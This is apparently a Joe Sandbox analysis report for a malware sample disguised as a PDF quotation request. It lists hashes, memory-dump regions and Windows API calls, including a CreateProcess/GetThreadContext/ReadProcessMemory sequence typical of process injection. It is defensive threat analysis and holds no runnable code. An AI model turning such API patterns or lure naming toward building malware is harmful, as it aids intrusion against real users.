                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                    • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                    • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                    • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                    • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                    • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                    • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 1794320848-0
                                                                    • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                    • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                    • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                    • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Process$CurrentTerminate
• String ID:
• API String ID: 2429186680-0
• Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
• Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
• Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
• Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
• Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
• Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
• Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
• Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
  • Part of subcall function 00403B70: _memmove.LIBCMT ref: 00403BA7
Strings
Similarity
• API ID: ByteCharMultiWide$_malloc_memmove
• String ID: \5@
• API String ID: 961785871-1309314528
• Opcode ID: 593b96bae4507f388c2b45a63525b102ab9916beddf5c8fa7589e437835f9edd
• Instruction ID: cad64edcdcba5d9ec8cd2b6a335bbe98b4fe19d5968b0e5b1ca7a0aa7405deab
• Opcode Fuzzy Hash: 593b96bae4507f388c2b45a63525b102ab9916beddf5c8fa7589e437835f9edd
• Instruction Fuzzy Hash: 7801D6713402007FE714AB669C86F6B7B9CDB85725F14403ABA09DB2D1D9B1ED008365
APIs
• _malloc.LIBCMT ref: 0043214B
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _malloc.LIBCMT ref: 0043215D
• _malloc.LIBCMT ref: 0043216F
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0
• Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
• Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
• Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
• Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
APIs
• TranslateMessage.USER32(?), ref: 00409556
• DispatchMessageW.USER32(?), ref: 00409561
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
• Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
• Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
• Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
• Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
• SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
• CloseHandle.KERNEL32(00000000), ref: 00431E14
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
• Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
• Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
• Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
APIs
• _free.LIBCMT ref: 0043210A
  • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
  • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
• _free.LIBCMT ref: 0043211D
• _free.LIBCMT ref: 00432130
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
• Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
• Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
• Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
APIs
• __wsplitpath.LIBCMT ref: 004678F7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
Similarity
• API ID: ErrorLast__wsplitpath_malloc
• String ID:
• API String ID: 4163294574-0
• Opcode ID: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
• Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
• Opcode Fuzzy Hash: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
• Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
APIs
  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
• _strcat.LIBCMT ref: 0040F786
  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
Similarity
• API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
• String ID:
• API String ID: 3199840319-0
• Opcode ID: 184cd8420872ce2487ddf7aadb861007254b50f98d2a6d2ea2427860c6a86edc
• Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
• Opcode Fuzzy Hash: 184cd8420872ce2487ddf7aadb861007254b50f98d2a6d2ea2427860c6a86edc
• Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
APIs
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
• FreeLibrary.KERNEL32(?), ref: 0040D78E
Similarity
• API ID: FreeInfoLibraryParametersSystem
• String ID:
• API String ID: 3403648963-0
• Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
• Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
• Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
• Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                                    • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                    • Opcode Fuzzy Hash: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                                    • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                    APIs
                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00415012
                                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2999321469-0
                                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03261AA3
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03261B39
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03261B5B
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                    • Instruction ID: fdd5aa0e610dc2cd72dde5d382712253eb9983a44f415c151d58865f62e4ca31
                                                                    • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                    • Instruction Fuzzy Hash: 4012EC24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5ED1CF5A
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _memmove.LIBCMT ref: 0046FAF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc_memmove
                                                                    • String ID:
                                                                    • API String ID: 1183979061-0
                                                                    • Opcode ID: a70ece6c2f64391aba36cace3f64c0e351dd3eff5a0fa39c8564997533122c8d
                                                                    • Instruction ID: 255320ec14e83fec4e4552c633d3a07f96161bd336a5b43614f928d9f0269463
                                                                    • Opcode Fuzzy Hash: a70ece6c2f64391aba36cace3f64c0e351dd3eff5a0fa39c8564997533122c8d
                                                                    • Instruction Fuzzy Hash: E551E6722043009BD310EF65DD82F5BB399AF89704F14492FF9859B382DB39E909C79A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 8df657b0635ddf40311d8f99a62f57a258a1744c88a1c496cf738bcc6a35415e
                                                                    • Instruction ID: 6b219bc4c0bbc29583a32018d9336d0aaf9d3e1b43f092b4040c7a5c6c0e764f
                                                                    • Opcode Fuzzy Hash: 8df657b0635ddf40311d8f99a62f57a258a1744c88a1c496cf738bcc6a35415e
                                                                    • Instruction Fuzzy Hash: 18415EB4500612EBC710EF56C4C156AFBB0FF48308F2088AFE5D617355DBB9A950DB86
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 1df35ced6376be517e7c74ad99ccbd00765a5d0df5d1e0e90f92159815d7b44c
                                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                    • Opcode Fuzzy Hash: 1df35ced6376be517e7c74ad99ccbd00765a5d0df5d1e0e90f92159815d7b44c
                                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0040E028
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                                    • Instruction ID: 77665f5636f8aa13b7259ebce8dce40215e8c2ccffea67f4db7731d49ba0d040
                                                                    • Opcode Fuzzy Hash: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                                    • Instruction Fuzzy Hash: 6C319C71B007159FCB24CF6EC88496BB7F6FB84310B14CA3EE45A93740D679E9458B54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: efc549f785c575d7fc561f162d3cdf3fadd14233f012674f3910e14d59da33a7
